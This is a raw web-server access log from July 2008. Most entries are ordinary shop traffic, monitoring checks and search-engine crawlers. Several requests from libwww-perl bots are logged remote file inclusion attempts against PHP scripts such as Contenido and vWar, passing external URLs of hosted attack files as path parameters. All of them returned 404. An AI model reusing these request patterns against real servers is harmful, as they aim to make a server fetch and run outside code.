213.133.102.211 - - [15/Jul/2008:02:55:02 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.806"
213.133.102.211 - - [15/Jul/2008:02:55:02 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.806"
209.59.12.99 - - [15/Jul/2008:02:56:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.235.106.210 - - [15/Jul/2008:02:58:27 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099306" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.235.106.210 - - [15/Jul/2008:02:58:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LEF905C226961E900B785061+M37+ENG HTTP/1.1" 200 75793 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099306" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.235.106.210 - - [15/Jul/2008:02:58:50 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LEF905C226961E900B785061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.30.73.117 - - [15/Jul/2008:02:58:51 -0400] "GET /logs/error_log.Q108012800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://geocities.com/rais_corp/tusuk.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
200.30.73.117 - - [15/Jul/2008:02:58:51 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://geocities.com/rais_corp/tusuk.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
200.30.73.117 - - [15/Jul/2008:02:58:52 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://geocities.com/rais_corp/tusuk.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
72.235.106.210 - - [15/Jul/2008:02:58:53 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LEF905C226961E900B785061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.235.106.210 - - [15/Jul/2008:02:58:53 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LEF905C226961E900B785061+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.249.73.25 - - [15/Jul/2008:02:59:39 -0400] "GET /logs/access_log.Q107061700 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.179 - - [15/Jul/2008:03:01:16 -0400] "GET /logs/error_log.Q107062500 HTTP/1.0" 200 93622 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [15/Jul/2008:03:01:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.196.64.12 - - [15/Jul/2008:03:06:05 -0400] "GET /logs//bits_listings.php?svr_rootPhpStart=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
217.196.64.12 - - [15/Jul/2008:03:06:05 -0400] "GET //bits_listings.php?svr_rootPhpStart=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
24.110.120.68 - - [15/Jul/2008:03:06:14 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
24.110.120.68 - - [15/Jul/2008:03:06:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
24.110.120.68 - - [15/Jul/2008:03:06:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
24.110.120.68 - - [15/Jul/2008:03:06:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
